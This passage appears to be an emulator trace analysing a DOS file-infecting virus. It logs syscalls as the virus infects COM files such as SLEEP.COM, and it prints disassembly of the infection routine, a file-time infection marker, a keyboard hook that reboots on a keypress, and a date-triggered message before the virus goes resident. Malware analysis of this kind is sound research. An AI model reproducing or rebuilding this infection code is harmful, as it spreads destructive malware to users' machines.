2018-12-25T11:43:44.896677819Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:44.898850348Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:44.901848176Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:44.904345072Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:44.906976617Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:44.90852844Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:44.916466385Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:44.926117952Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:44.928538542Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:44.938980591Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:44.945288128Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:44.95159537Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:44.953222441Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:44.956417092Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:44.964354827Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:44.965867431Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:44.973281899Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:44.974921308Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:44.982516918Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:44.992757331Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:44.995465099Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:45.004790663Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:45.012305753Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:45.018646934Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:45.019931732Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:45.022693689Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:45.025276306Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:45.02648386Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:45.029653056Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:45.030951231Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:45.038281377Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:45.048945978Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:45.051919748Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:45.061573666Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:45.068798475Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:45.076721895Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:45.078346162Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:45.081670634Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:45.090074099Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:45.091381191Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:45.098293568Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:45.099583269Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:45.10723622Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:45.117508178Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:45.119816099Z 42 PC: 12b21 | Get date 0x12b21: cmp dl, 1
0x12b24: je 0x12b29
0x12b26: jmp 0x12b93
0x12b28: nop
0x12b29: mov ah, 9
0x12b2b: lea dx, word ptr [bp + 0x2b0]
0x12b2f: int 0x21
0x12b31: jmp 0x12b60
0x12b33: nop
0x12b34: push ax
0x12b35: in al, 0x60
0x12b37: cmp al, 0x53
0x12b39: nop
0x12b3a: nop
0x12b3b: je 0x12b43
0x12b3d: pop ax
0x12b3e: ljmp ptr cs:[0x2d4]
0x12b43: ljmp 0xffff:0
0x12b48: iret
0x12b49: cmp ax, 0x4b00
2018-12-25T11:43:45.121847597Z 26 PC: 12b9d | Set disk transfer address

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1452,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:43:44.818770071Z 26 PC: 12a83 | Set disk transfer address
2018-12-25T11:43:44.821024764Z 78 PC: 12a8e | Find first file
2018-12-25T11:43:44.826973988Z 67 PC: 12aaf | Get or set file attributes
2018-12-25T11:43:44.842225555Z 61 PC: 12ab8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:44.854401318Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:43:44.861152371Z 66 PC: 12acc | Move file pointer
2018-12-25T11:43:44.862740263Z 44 PC: 12adb | Get time 0x12adb: mov word ptr [bp + 0x11e], dx
0x12adf: call 0x22a4c
0x12ae2: cdq
0x12ae3: sub cx, cx
0x12ae5: mov ax, 0x4200
0x12ae8: int 0x21
0x12aea: lea dx, word ptr [bp + 0x2d1]
0x12aee: mov cx, 3
0x12af1: mov ah, 0x40
0x12af3: int 0x21
0x12af5: mov dx, word ptr [bp + 0x2f4]
0x12af9: mov cx, word ptr [bp + 0x2f2]
0x12afd: and cl, 0xe0
0x12b00: or cl, 0x15
0x12b03: mov ax, 0x5701
0x12b06: int 0x21
0x12b08: mov ah, 0x3e
0x12b0a: int 0x21
0x12b0c: lea dx, word ptr [bp + 0x2fa]
0x12b10: sub cx, cx
2018-12-25T11:43:44.8661192Z 64 PC: 12a5a | Write file or device (Write 465 bytes on handle 5)
2018-12-25T11:43:44.875115053Z 66 PC: 12aea | Move file pointer
2018-12-25T11:43:44.876541256Z 64 PC: 12af5 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:43:44.882925974Z 87 PC: 12b08 | Get or set file date and time
2018-12-25T11:43:44.885960069Z 62 PC: 12b0c | Close file
2018-12-25T11:43:44.893640772Z 67 PC: 12b1b | Get or set file attributes
2018-12-25T11:43:44.904799369Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:44.908490493Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:44.917917981Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:44.924410255Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:44.931966411Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:44.933691831Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:44.936236453Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:44.939956672Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:44.94130456Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:44.943797705Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:44.945506889Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:44.952994429Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:44.962793956Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:44.965354816Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:44.974919142Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:44.981672935Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:44.988237882Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:44.990759147Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:44.99234691Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:44.998090684Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:45.000095452Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:45.006734823Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:45.008496037Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:45.017490857Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:45.027310791Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:45.030327426Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:45.040620989Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:45.047430088Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:45.054436805Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:45.056768864Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:45.058997241Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:45.062059346Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:45.064141782Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:45.067420421Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:45.06887935Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:45.076658257Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:45.086841081Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:45.089383791Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:45.099846382Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:45.106750483Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:45.112738746Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:45.11436011Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:45.116965572Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:45.119971884Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:45.121929035Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:45.124895498Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:45.126432018Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:45.134552053Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:45.145234789Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:45.14811773Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:45.158502316Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:45.16535126Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:45.171703107Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:45.174005963Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:45.177456872Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:45.185587371Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:45.186823613Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:45.193033697Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:45.194389954Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:45.201989473Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:45.21157929Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:45.213965726Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:45.222976919Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:45.230098487Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:45.236197196Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:45.237815003Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:45.241226919Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:45.244195522Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:45.245743687Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:45.249098583Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:45.250614487Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:45.257522474Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:45.26994951Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:45.273221414Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:45.285357636Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:45.292507851Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:45.298895909Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:45.300358392Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:45.303259844Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:45.31185854Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:45.31318683Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:45.320240027Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:45.321714349Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:45.329857363Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:45.34092902Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:45.343791355Z 42 PC: 12b21 | Get date 0x12b21: cmp dl, 1
0x12b24: je 0x12b29
0x12b26: jmp 0x12b93
0x12b28: nop
0x12b29: mov ah, 9
0x12b2b: lea dx, word ptr [bp + 0x2b0]
0x12b2f: int 0x21
0x12b31: jmp 0x12b60
0x12b33: nop
0x12b34: push ax
0x12b35: in al, 0x60
0x12b37: cmp al, 0x53
0x12b39: nop
0x12b3a: nop
0x12b3b: je 0x12b43
0x12b3d: pop ax
0x12b3e: ljmp ptr cs:[0x2d4]
0x12b43: ljmp 0xffff:0
0x12b48: iret
0x12b49: cmp ax, 0x4b00
2018-12-25T11:43:45.346224605Z 26 PC: 12b9d | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1452,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:43:44.900153365Z 26 PC: 12a83 | Set disk transfer address
2018-12-25T11:43:44.903385583Z 78 PC: 12a8e | Find first file
2018-12-25T11:43:44.909333817Z 67 PC: 12aaf | Get or set file attributes
2018-12-25T11:43:44.924618324Z 61 PC: 12ab8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:44.93196342Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:43:44.938478444Z 66 PC: 12acc | Move file pointer
2018-12-25T11:43:44.940096634Z 44 PC: 12adb | Get time 0x12adb: mov word ptr [bp + 0x11e], dx
0x12adf: call 0x22a4c
0x12ae2: cdq
0x12ae3: sub cx, cx
0x12ae5: mov ax, 0x4200
0x12ae8: int 0x21
0x12aea: lea dx, word ptr [bp + 0x2d1]
0x12aee: mov cx, 3
0x12af1: mov ah, 0x40
0x12af3: int 0x21
0x12af5: mov dx, word ptr [bp + 0x2f4]
0x12af9: mov cx, word ptr [bp + 0x2f2]
0x12afd: and cl, 0xe0
0x12b00: or cl, 0x15
0x12b03: mov ax, 0x5701
0x12b06: int 0x21
0x12b08: mov ah, 0x3e
0x12b0a: int 0x21
0x12b0c: lea dx, word ptr [bp + 0x2fa]
0x12b10: sub cx, cx
2018-12-25T11:43:44.943595903Z 64 PC: 12a5a | Write file or device (Write 465 bytes on handle 5)
2018-12-25T11:43:44.953106284Z 66 PC: 12aea | Move file pointer
2018-12-25T11:43:44.955168384Z 64 PC: 12af5 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:43:44.961490995Z 87 PC: 12b08 | Get or set file date and time
2018-12-25T11:43:44.963726129Z 62 PC: 12b0c | Close file
2018-12-25T11:43:44.971267696Z 67 PC: 12b1b | Get or set file attributes
2018-12-25T11:43:44.980835989Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:44.987339965Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:44.997009291Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:45.003563967Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:45.010275354Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:45.013051049Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:45.015687898Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:45.019453769Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:45.021098567Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:45.024768323Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:45.027255486Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:45.034685142Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:45.044732018Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:45.048354973Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:45.05845163Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:45.065336486Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:45.072804869Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:45.0797241Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:45.081974139Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:45.09025268Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:45.095648325Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:45.10235062Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:45.103917856Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:45.113934266Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:45.124359814Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:45.127836616Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:45.138628037Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:45.145573821Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:45.152378177Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:45.154837707Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:45.157325299Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:45.160829333Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:45.163025138Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:45.166478772Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:45.167946139Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:45.175701822Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:45.185407134Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:45.187833797Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:45.197538221Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:45.203681349Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:45.209534442Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:45.21143472Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:45.213561074Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:45.216195256Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:45.217745769Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:45.220212423Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:45.221595096Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:45.2291348Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:45.239133501Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:45.242122562Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:45.252507781Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:45.259502648Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:45.266333981Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:45.268545465Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:45.271005846Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:45.27893241Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:45.281226275Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:45.287792896Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:45.289491999Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:45.298216184Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:45.308328173Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:45.311125287Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:45.321350349Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:45.329045944Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:45.335655721Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:45.337416122Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:45.340555763Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:45.343378974Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:45.344728438Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:45.347998002Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:45.349822841Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:45.357327435Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:45.368018552Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:45.370620216Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:45.380145257Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:45.387292139Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:45.389990221Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:45.392100005Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:45.395091142Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:45.404884995Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:45.406310237Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:45.414120935Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:45.415882645Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:45.423492547Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:45.43401019Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:45.436479239Z 42 PC: 12b21 | Get date 0x12b21: cmp dl, 1
0x12b24: je 0x12b29
0x12b26: jmp 0x12b93
0x12b28: nop
0x12b29: mov ah, 9
0x12b2b: lea dx, word ptr [bp + 0x2b0]
0x12b2f: int 0x21
0x12b31: jmp 0x12b60
0x12b33: nop
0x12b34: push ax
0x12b35: in al, 0x60
0x12b37: cmp al, 0x53
0x12b39: nop
0x12b3a: nop
0x12b3b: je 0x12b43
0x12b3d: pop ax
0x12b3e: ljmp ptr cs:[0x2d4]
0x12b43: ljmp 0xffff:0
0x12b48: iret
0x12b49: cmp ax, 0x4b00
2018-12-25T11:43:45.438519917Z 9 PC: 12b31 | Display string (String= 'Bad command or filename')
2018-12-25T11:43:45.440980198Z 53 PC: 12b65 | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T11:43:45.442223201Z 37 PC: 12b77 | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T11:43:45.443285844Z 53 PC: 12b7c | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:43:45.444918416Z 37 PC: 12b8e | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:43:45.45280838Z 49 PC: 12b93 | Terminate and stay resident (Return code = '0' | Memory size = '34')